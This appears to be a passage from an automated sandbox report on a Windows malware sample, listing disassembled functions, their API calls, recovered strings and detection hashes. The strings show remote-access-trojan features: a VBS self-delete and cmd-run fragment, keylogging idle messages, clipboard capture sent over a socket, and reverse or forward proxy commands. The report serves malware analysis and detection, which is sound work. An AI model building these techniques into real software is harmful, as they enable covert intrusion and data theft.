                                      • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                      • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                    • _free.LIBCMT ref: 004513A1
                                    • _free.LIBCMT ref: 004513B6
                                    • _free.LIBCMT ref: 004513C1
                                    • _free.LIBCMT ref: 004513E3
                                    • _free.LIBCMT ref: 004513F6
                                    • _free.LIBCMT ref: 00451404
                                    • _free.LIBCMT ref: 0045140F
                                    • _free.LIBCMT ref: 00451447
                                    • _free.LIBCMT ref: 0045144E
                                    • _free.LIBCMT ref: 0045146B
                                    • _free.LIBCMT ref: 00451483
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                    • String ID:
                                    • API String ID: 161543041-0
                                    • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                    • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                    • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                    • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                    Function 0040D83A Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
                                      • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF,?,0040D84A), ref: 004128AE
                                      • Part of subcall function 00413733: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 0041374F
                                      • Part of subcall function 00413733: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00413768
                                      • Part of subcall function 00413733: RegCloseKey.ADVAPI32(?), ref: 00413773
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                    • ExitProcess.KERNEL32 ref: 0040D9FF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                    • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                    • API String ID: 1913171305-3159800282
                                    • Opcode ID: f9fb1c58427f12af755a52ca3692b6cbef369107a25d9b00b3b70057595488dd
                                    • Instruction ID: 6f299f75ad759bd4c56b3f4cab90e5e1fe41ff60d22e8747b975e3d2bb757992
                                    • Opcode Fuzzy Hash: f9fb1c58427f12af755a52ca3692b6cbef369107a25d9b00b3b70057595488dd
                                    • Instruction Fuzzy Hash: 9B4129719001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E8ACA98
                                    Function 00450680 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                    • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                                    • Opcode Fuzzy Hash: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                    • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                                    Function 00455C5B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000,?,00455D04,00000000,0000000C), ref: 00455946
                                    • GetLastError.KERNEL32 ref: 00455D6F
                                    • __dosmaperr.LIBCMT ref: 00455D76
                                    • GetFileType.KERNEL32(00000000), ref: 00455D82
                                    • GetLastError.KERNEL32 ref: 00455D8C
                                    • __dosmaperr.LIBCMT ref: 00455D95
                                    • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                    • CloseHandle.KERNEL32(?), ref: 00455EFF
                                    • GetLastError.KERNEL32 ref: 00455F31
                                    • __dosmaperr.LIBCMT ref: 00455F38
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                    • String ID: H
                                    • API String ID: 4237864984-2852464175
                                    • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                    • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                                    • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                    • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                                    Function 0044ACC9 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 216COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,tC,0043EA74,?,?,PkGNG,0044AF1A,00000001,00000001,A4E85006), ref: 0044AD23
                                    • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,PkGNG,0044AF1A,00000001,00000001,A4E85006,?,?,?), ref: 0044ADA9
                                    • __alloca_probe_16.LIBCMT ref: 0044AE40
                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,A4E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                    • __freea.LIBCMT ref: 0044AEB0
                                      • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                    • __freea.LIBCMT ref: 0044AEB9
                                    • __freea.LIBCMT ref: 0044AEDE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                    • String ID: PkGNG$tC
                                    • API String ID: 3864826663-4196309852
                                    • Opcode ID: a3cbb47ee8d45342a2f0fb6a002504832f0ae0c467949e665f7c3dc78735deda
                                    • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                    • Opcode Fuzzy Hash: a3cbb47ee8d45342a2f0fb6a002504832f0ae0c467949e665f7c3dc78735deda
                                    • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A
                                    Function 00450AA5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID: \&G$\&G$`&G
                                    • API String ID: 269201875-253610517
                                    • Opcode ID: f361c4fdd0f35bb0b590f5a399794b5d5c57f6d7c3c5bbd0b76040d27d65b4a3
                                    • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                                    • Opcode Fuzzy Hash: f361c4fdd0f35bb0b590f5a399794b5d5c57f6d7c3c5bbd0b76040d27d65b4a3
                                    • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                                    Function 00414BEB Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 65535$udp
                                    • API String ID: 0-1267037602
                                    • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                    • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                                    • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                    • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                                    Function 0040AD11 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 0040AD73
                                    • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                                    • GetForegroundWindow.USER32 ref: 0040AD84
                                    • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                                    • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040ADC1
                                    • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                      • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                    • String ID: [${ User has been idle for $ minutes }$]
                                    • API String ID: 911427763-3954389425
                                    • Opcode ID: a9d80c92317e710bb0ee7b8060ee11baa7f71990c7fa4e3373d3f7fac537cda3
                                    • Instruction ID: 479ab846abdc3ffa357cf8cfb056c4a9d7a1c57035fbb5610920680a3dc8d5cf
                                    • Opcode Fuzzy Hash: a9d80c92317e710bb0ee7b8060ee11baa7f71990c7fa4e3373d3f7fac537cda3
                                    • Instruction Fuzzy Hash: 1251E2716043419BD714FB22D856AAE7795AF84308F10093FF986A22E2EF7C9D44C69F
                                    Function 0040DA6F Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DBD5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LongNamePath
                                    • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                    • API String ID: 82841172-425784914
                                    • Opcode ID: 9fc837d8cdd91ddad254a0e7a0cf26b33e0d7c4ac323512d933d46fc1d77c410
                                    • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                    • Opcode Fuzzy Hash: 9fc837d8cdd91ddad254a0e7a0cf26b33e0d7c4ac323512d933d46fc1d77c410
                                    • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B
                                    Function 0043A8BA Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                    • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                    • __dosmaperr.LIBCMT ref: 0043A926
                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                    • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                    • __dosmaperr.LIBCMT ref: 0043A963
                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                    • __dosmaperr.LIBCMT ref: 0043A9B7
                                    • _free.LIBCMT ref: 0043A9C3
                                    • _free.LIBCMT ref: 0043A9CA
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                    • String ID:
                                    • API String ID: 2441525078-0
                                    • Opcode ID: 65e47024088546fc334146591d56820f873165bf99cfabfd31b4add3ed5f98c2
                                    • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                                    • Opcode Fuzzy Hash: 65e47024088546fc334146591d56820f873165bf99cfabfd31b4add3ed5f98c2
                                    • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                                    Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SetEvent.KERNEL32(?,?), ref: 004054BF
                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                    • TranslateMessage.USER32(?), ref: 0040557E
                                    • DispatchMessageA.USER32(?), ref: 00405589
                                    • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                    • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                    • String ID: CloseChat$DisplayMessage$GetMessage
                                    • API String ID: 2956720200-749203953
                                    • Opcode ID: 92a42e6f76523c23ad071d277faa5832b5c30b25a00b0af7c670b91f71b4b998
                                    • Instruction ID: d37e718accd843302ceacc2187c81124e04698433963f5de03abd71ab6b9016f
                                    • Opcode Fuzzy Hash: 92a42e6f76523c23ad071d277faa5832b5c30b25a00b0af7c670b91f71b4b998
                                    • Instruction Fuzzy Hash: 39419071A04301ABCB14FB76DC5A86F37A9AB85704F40493EF516A31E1EF3C8905CB9A
                                    Function 00417D1A Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                    • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                    • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                    • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                    • String ID: 0VG$0VG$<$@$Temp
                                    • API String ID: 1704390241-2575729100
                                    • Opcode ID: 770267ec3d45abc508c60553e0d69256dfd3bd3466962ea0f4637c0737b4c84d
                                    • Instruction ID: 01f79aac078c9204ae4226344def03f9678a0966abb138ad227abf0e83d93267
                                    • Opcode Fuzzy Hash: 770267ec3d45abc508c60553e0d69256dfd3bd3466962ea0f4637c0737b4c84d
                                    • Instruction Fuzzy Hash: 18417E319002099ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                                    Function 0041697B Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 46clipboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenClipboard.USER32 ref: 0041697C
                                    • EmptyClipboard.USER32 ref: 0041698A
                                    • CloseClipboard.USER32 ref: 00416990
                                    • OpenClipboard.USER32 ref: 00416997
                                    • GetClipboardData.USER32(0000000D), ref: 004169A7
                                    • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                    • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                    • CloseClipboard.USER32 ref: 004169BF
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                    • String ID: !D@
                                    • API String ID: 2172192267-604454484
                                    • Opcode ID: da78ba80ec0729aaebbd7618c01a60a0d67124b513bef4f543176b1e835a0158
                                    • Instruction ID: c3dc955394dadbf9cb8fa72aed918e4e170398eafb94270add22466952777bd7
                                    • Opcode Fuzzy Hash: da78ba80ec0729aaebbd7618c01a60a0d67124b513bef4f543176b1e835a0158
                                    • Instruction Fuzzy Hash: AA014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                    Function 0041330D Relevance: 15.2, APIs: 10, Instructions: 153fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                    • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                    • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                    • CloseHandle.KERNEL32(?), ref: 004134A0
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                    • String ID:
                                    • API String ID: 297527592-0
                                    • Opcode ID: 574f29b59094fb47ce71c879203f8806fd1a71798bcc0508934a1059045681f6
                                    • Instruction ID: 84c8eec30da1abd4ec43dfc3561b6153623c17c5959ee0fa3a13cc5c00e14cc2
                                    • Opcode Fuzzy Hash: 574f29b59094fb47ce71c879203f8806fd1a71798bcc0508934a1059045681f6
                                    • Instruction Fuzzy Hash: F041F331104301BBD7119F25EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                                    Function 0041AB9E Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                    • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID:
                                    • API String ID: 221034970-0
                                    • Opcode ID: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
                                    • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                    • Opcode Fuzzy Hash: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
                                    • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                                    Function 004481A1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 004481B5
                                      • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                      • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                    • _free.LIBCMT ref: 004481C1
                                    • _free.LIBCMT ref: 004481CC
                                    • _free.LIBCMT ref: 004481D7
                                    • _free.LIBCMT ref: 004481E2
                                    • _free.LIBCMT ref: 004481ED
                                    • _free.LIBCMT ref: 004481F8
                                    • _free.LIBCMT ref: 00448203
                                    • _free.LIBCMT ref: 0044820E
                                    • _free.LIBCMT ref: 0044821C
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                    • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                    • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                    • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                    Function 00411530 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Eventinet_ntoa
                                    • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                    • API String ID: 3578746661-3604713145
                                    • Opcode ID: a7da0e03d27dfd4f061563b37853281ba9d59ca7803a508e71efe6cf15854c11
                                    • Instruction ID: 5b49fc9f60f15aadef5e91219dcc0d557585a55aed20fbc46105045b647f8dc0
                                    • Opcode Fuzzy Hash: a7da0e03d27dfd4f061563b37853281ba9d59ca7803a508e71efe6cf15854c11
                                    • Instruction Fuzzy Hash: 5351D531A042015BC714FB36D95AAAE36A5AB84344F40453FFA06676F2EF7C8985C7CE
                                    Function 00455F84 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DecodePointer
                                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                                    • API String ID: 3527080286-3064271455
                                    • Opcode ID: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                    • Instruction ID: a80f67f54703b8f0c72b4cfac69ffbb6288a0afb30985e2ab5cebdbe3ffe6fde
                                    • Opcode Fuzzy Hash: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                    • Instruction Fuzzy Hash: BB515071900909DBCF10DF58E9481BDBBB0FF49306F924197D841A7396DB798928CB1E
                                    Function 0044B43C Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,PkGNG,0044BBB1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B47E
                                    • __fassign.LIBCMT ref: 0044B4F9
                                    • __fassign.LIBCMT ref: 0044B514
                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                    • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BBB1,?), ref: 0044B559
                                    • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BBB1,?), ref: 0044B592
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                    • String ID: PkGNG
                                    • API String ID: 1324828854-263838557
                                    • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                    • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                    • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                    • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                    Function 004174D0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                      • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                    • Sleep.KERNEL32(00000064), ref: 0041755C
